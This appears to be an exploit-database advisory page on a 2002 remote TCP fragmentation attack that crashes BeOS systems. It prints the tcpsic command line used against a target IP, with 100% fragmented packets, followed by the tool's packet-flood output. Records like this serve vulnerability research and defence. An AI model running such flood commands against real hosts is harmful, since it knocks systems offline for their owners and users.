BeOS Remote TCP Fragmentation Attack

vendor:

BeOS

by:

SecurityFocus

7.5

CVSS

HIGH

Remote TCP Fragmentation Attack

N/A

CWE

Product Name: BeOS

Affected Version From: BeOS

Affected Version To: BeOS

Patch Exists: No

Related CWE: N/A

CPE: o:be:beos

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

BeOS Remote TCP Fragmentation Attack

BeOS is vulnerable to a remote TCP fragmentation attack that will crash the target system, requiring a reboot. This attack can be executed using the tcpsic tool, which sends a series of fragmented packets to the target system.

Mitigation:

N/A

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1222/info

BeOS is vulnerable to a remote TCP fragmentation attack that will crash the target system, requiring a reboot. 

[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0
-I0 -T0 -u0 -t0
Compiled against Libnet 1.0.1b
Installing Signal Handlers.
Seeding with 31337
No Maximum traffic limiter
Using random source ports.
Using random destination ports.
Bad IP Version = 0% IP Opts Pcnt = 0%
Frag'd Pcnt = 100% Urg Pcnt = 0%
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%

1000 @ 1802.8 pkts/sec and 1174.6 k/s
2000 @ 1636.8 pkts/sec and 1105.5 k/s
3000 @ 2110.2 pkts/sec and 1396.4 k/s
4000 @ 1689.1 pkts/sec and 1105.4 k/s
Caught signal 2
Used random seed 31337
Wrote 5002 packets in 2.74s @ 1824.48 pkts/s